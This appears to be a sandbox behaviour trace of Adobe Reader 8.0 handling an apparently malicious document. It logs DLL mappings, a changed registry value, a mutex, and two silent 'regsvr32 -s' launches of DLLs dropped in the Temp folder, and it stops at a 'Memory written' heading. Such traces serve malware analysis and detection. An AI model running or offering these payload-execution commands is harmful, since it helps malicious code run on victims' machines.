C:\Program Files\Adobe\Reader 8.0\Reader\CoolType.dll query and write and read and execute image 8000000 2334720 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 8000000 2334720 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\BIB.dll write and read and execute unknown 76B40000 184320 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\BIB.dll query and write and read and execute image 7000000 106496 own pid read write success or wait 1
\KnownDlls\ACE.dll write and read and execute unknown 7000000 106496 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\ACE.dll query and write and read and execute image 5000000 696320 own pid read write success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 17D0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 17D0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 17E0000 262144 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit 1920000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit 1920000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit 1920000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit 1920000 180224 own pid readonly success or wait 1
\KnownDlls\apphelp.dll write and read and execute unknown 77B40000 139264 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 1920000 1208320 own pid readonly success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown 1920000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit 1930000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 1930000 1208320 own pid readonly success or wait 1
\KnownDlls\SETUPAPI.dll write and read and execute unknown 1930000 1208320 own pid readonly object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\WINDOWS\system32\winlogon.exe write and read and execute commit 1B30000 507904 own pid execute success or wait 1
\KnownDlls\xpsp2res.dll write and read and execute unknown 1B30000 507904 own pid execute object name not found 1
C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image 1B30000 2904064 own pid read write conflicting addresses 1
\KnownDlls\Accessibility.api write and read and execute unknown 1B30000 2904064 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api query and write and read and execute image 29800000 372736 own pid read write success or wait 1
\KnownDlls\AcroForm.api write and read and execute unknown 29800000 372736 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api query and write and read and execute image 20800000 9744384 own pid read write success or wait 1
\KnownDlls\USP10.dll write and read and execute unknown 20800000 9744384 own pid read write object name not found 1
C:\WINDOWS\system32\usp10.dll query and write and read and execute image 74D90000 438272 own pid read write success or wait 1
\KnownDlls\Annots.api write and read and execute unknown 74D90000 438272 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api query and write and read and execute image 22100000 4165632 own pid read write success or wait 1
\KnownDlls\Checkers.api write and read and execute unknown 22100000 4165632 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api query and write and read and execute image 45800000 851968 own pid read write success or wait 1
\KnownDlls\DigSig.api write and read and execute unknown 45800000 851968 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api query and write and read and execute image 23000000 1167360 own pid read write success or wait 1
\KnownDlls\DVA.api write and read and execute unknown 23000000 1167360 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api query and write and read and execute image 40800000 139264 own pid read write success or wait 1
\KnownDlls\eBook.api write and read and execute unknown 40800000 139264 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api query and write and read and execute image 26800000 65536 own pid read write success or wait 1
\KnownDlls\EScript.api write and read and execute unknown 26800000 65536 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api query and write and read and execute image 23800000 1437696 own pid read write success or wait 1
\KnownDlls\EWH32.api write and read and execute unknown 23800000 1437696 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api query and write and read and execute image 24000000 147456 own pid read write success or wait 1
\KnownDlls\HLS.api write and read and execute unknown 24000000 147456 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api query and write and read and execute image 31800000 69632 own pid read write success or wait 1
\KnownDlls\IA32.api write and read and execute unknown 31800000 69632 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api query and write and read and execute image 25800000 98304 own pid read write success or wait 1
\KnownDlls\ImageViewer.API write and read and execute unknown 25800000 98304 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API query and write and read and execute image 46800000 475136 own pid read write success or wait 1
\KnownDlls\MakeAccessible.api write and read and execute unknown 46800000 475136 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api query and write and read and execute image 29000000 2273280 own pid read write success or wait 1
\KnownDlls\Multimedia.api write and read and execute unknown 29000000 2273280 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api query and write and read and execute image 2D800000 1372160 own pid read write success or wait 1
\KnownDlls\PDDom.api write and read and execute unknown 2D800000 1372160 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api query and write and read and execute image 2B800000 417792 own pid read write success or wait 1
\KnownDlls\PPKLite.api write and read and execute unknown 2B800000 417792 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api query and write and read and execute image 28000000 5795840 own pid read write success or wait 1
\KnownDlls\ReadOutLoud.api write and read and execute unknown 28000000 5795840 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api query and write and read and execute image 29A00000 122880 own pid read write success or wait 1
\KnownDlls\reflow.api write and read and execute unknown 29A00000 122880 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api query and write and read and execute image 28800000 385024 own pid read write success or wait 1
\KnownDlls\SaveAsRTF.api write and read and execute unknown 28800000 385024 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api query and write and read and execute image 32000000 319488 own pid read write success or wait 1
\KnownDlls\Search.api write and read and execute unknown 32000000 319488 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api query and write and read and execute image 2A300000 372736 own pid read write success or wait 1
\KnownDlls\Search5.api write and read and execute unknown 2A300000 372736 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api query and write and read and execute image 2A000000 102400 own pid read write success or wait 1
\KnownDlls\SendMail.api write and read and execute unknown 2A000000 102400 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api query and write and read and execute image 2A800000 139264 own pid read write success or wait 1
\KnownDlls\Spelling.api write and read and execute unknown 2A800000 139264 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api query and write and read and execute image 2B000000 286720 own pid read write success or wait 1
\KnownDlls\Updater.api write and read and execute unknown 2B000000 286720 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api query and write and read and execute image 30800000 188416 own pid read write success or wait 1
\KnownDlls\weblink.api write and read and execute unknown 30800000 188416 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api query and write and read and execute image 2E000000 196608 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 2E000000 196608 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown 5AD70000 229376 own pid read write object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown 76FD0000 520192 own pid read write object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
C:\WINDOWS\system32\rasapi32.dll write and read and execute commit 2DD0000 237568 own pid execute success or wait 1
C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
\KnownDlls\rasman.dll write and read and execute unknown 76EE0000 245760 own pid read write object name not found 1
C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown 5B860000 348160 own pid read write success or wait 1
\KnownDlls\WS2_32.dll write and read and execute unknown 5B860000 348160 own pid read write object name not found 1
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
\KnownDlls\TAPI32.dll write and read and execute unknown 71AA0000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
\KnownDlls\rtutils.dll write and read and execute unknown 76EB0000 192512 own pid read write object name not found 1
C:\WINDOWS\system32\rtutils.dll query and write and read and execute image 76E80000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\tapi32.dll read commit 2DD0000 184320 own pid readonly success or wait 1
\BaseNamedObjects\ASMWIN0 query and write and read commit 2DD0000 4096 own pid read write success or wait 1
\BaseNamedObjects\ASMWIN1 query and write and read commit 2DD0000 4096 own pid read write success or wait 1
\BaseNamedObjects\ASMWIN2 query and write and read commit 2DD0000 4096 own pid read write success or wait 1
\KnownDlls\AXE8SharedExpat.dll write and read and execute unknown 2DD0000 4096 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\AXE8SharedExpat.dll query and write and read and execute image 10000000 184320 own pid read write success or wait 1
\KnownDlls\AXSLE.dll write and read and execute unknown 10000000 184320 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\AXSLE.dll query and write and read and execute image 2E10000 618496 own pid read write conflicting addresses 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 2EC0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown 71A50000 258048 own pid read write object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit 2EC0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\WLDAP32.dll write and read and execute unknown 76F60000 180224 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown 76F60000 180224 own pid read write object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
\KnownDlls\ATMLIB.dll write and read and execute unknown 76FC0000 24576 own pid read write object name not found 1
C:\WINDOWS\system32\atmlib.dll query and write and read and execute image 73C20000 45056 own pid read write success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\AdobePiStd.otf query and read commit 2EE0000 90112 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Bold.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-BoldOblique.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Oblique.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-Bold.otf query and read commit 2EE0000 212992 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-BoldIt.otf query and read commit 2EE0000 253952 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-It.otf query and read commit 2EE0000 253952 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-Regular.otf query and read commit 2EE0000 208896 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-Bold.otf query and read commit 2EE0000 98304 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-BoldIt.otf query and read commit 2EE0000 102400 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-It.otf query and read commit 2EE0000 102400 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-Regular.otf query and read commit 2EE0000 98304 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\SY______.PFB query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\icucnv34.dll write and read and execute commit 2EF0000 299008 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\icucnv34.dll query and write and read and execute image 4A800000 299008 own pid read write success or wait 1
\KnownDlls\icudt34.dll write and read and execute unknown 4A800000 299008 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\icudt34.dll query and write and read and execute image 4AD00000 90112 own pid read write success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Oblique.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Bold.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-BoldOblique.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\SY______.PFB query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\AdobePiStd.otf query and read commit 2F00000 90112 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-Regular.otf query and read commit 2F00000 98304 own pid readonly success or wait 1
unknown query and write and read and execute commit 2FC0000 4096 own pid execute and read and write success or wait 1
\KnownDlls\mlang.dll write and read and execute unknown 111B0000 622592 own pid readonly object name not found 1
C:\WINDOWS\system32\mlang.dll query and write and read and execute image 75CF0000 593920 own pid read write success or wait 1
C:\WINDOWS\system32\mlang.dll read commit 111B0000 589824 own pid readonly success or wait 1
\KnownDlls\WININET.dll write and read and execute unknown 771B0000 696320 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown 77B20000 73728 own pid read write success or wait 1
C:\WINDOWS\system32\wininet.dll read commit 111B0000 667648 own pid readonly success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_147456 write unknown 4F90000 147456 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Cookies_index.dat_32768 write unknown 4FC0000 32768 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768 write unknown 4FD0000 32768 own pid read write success or wait 1
\KnownDlls\wsock32.dll write and read and execute unknown 4FD0000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\wsock32.dll query and write and read and execute image 71AD0000 36864 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown 71AD0000 36864 own pid read write object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit 4FE0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
\KnownDlls\sensapi.dll write and read and execute unknown 71A90000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
\BaseNamedObjects\SENS Information Cache read unknown 4FE0000 4096 own pid readonly success or wait 1
\BaseNamedObjects\UrlZonesSM_Administrator query and write and read commit 4FE0000 4096 own pid readonly object name exists 1
C:\WINDOWS\system32\regsvr32.exe query and write and read and execute and extend size image 4FE0000 4096 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 115B0000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 5FB0000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 5FB0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 5FB0000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 5FB0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 5FB0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and write and read and execute and extend size image 5FB0000 12288 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 115B0000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 5FC0000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 5FC0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 5FC0000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 5FC0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 5FC0000 12288 own pid readonly success or wait 1
unknown query and write and read commit 6FD0000 12288 own pid read write success or wait 1
unknown query and write and read commit 6FD0000 12288 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\urlmon.dll write and read and execute unknown 7E1E0000 663552 own pid read write success or wait 1 2FC00D4
C:\WINDOWS\system32\urlmon.dll read commit 111B0000 622592 own pid readonly success or wait 1 2FC00D4
Registry Activities:
+ Key value replaced with new
Key Path Name Type Old Data New Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 Dword -1521036924 -1521036916 success or wait 1 5FC5F0A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Enabled object name not found 1 5FC5EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter EnabledV8 success or wait 1 5FC5EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter CleanCookies success or wait 1 5FC5FBA
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter CleanCookies success or wait 1 5FC5EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter 1406 success or wait 5 5FC5EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter 1609 success or wait 5 5FC5EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter 15807505 success or wait 1 5FC5F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter 15807505 success or wait 1 5FC5F7A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} object name exists 1 5FE0DFC
Process Activities:
+ Process started
PID Filepath Cmdline Flags Completion Count Source Address
1008 C:\WINDOWS\system32\regsvr32.exe regsvr32 -s C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt0.dll 0 success or wait 1 2FC014F
1852 C:\WINDOWS\system32\regsvr32.exe regsvr32 -s C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt1.dll 0 success or wait 1 2FC014F
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2140 1732 7C8106F9 false C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe success or wait 1 5FD8106
2556 1732 7C8106F9 false C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe success or wait 1 5FD8106
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212EBC 30 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C60A1 30 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771CE9C1 30 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212FC1 30 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C4D8C 30 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C82EA 30 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9100 30 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D89F7 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C79C2 30 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9C53 30 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D9064 30 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771BB1D8 30 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB676F 30 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB4CB5 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 5FDF078
+ Memory written
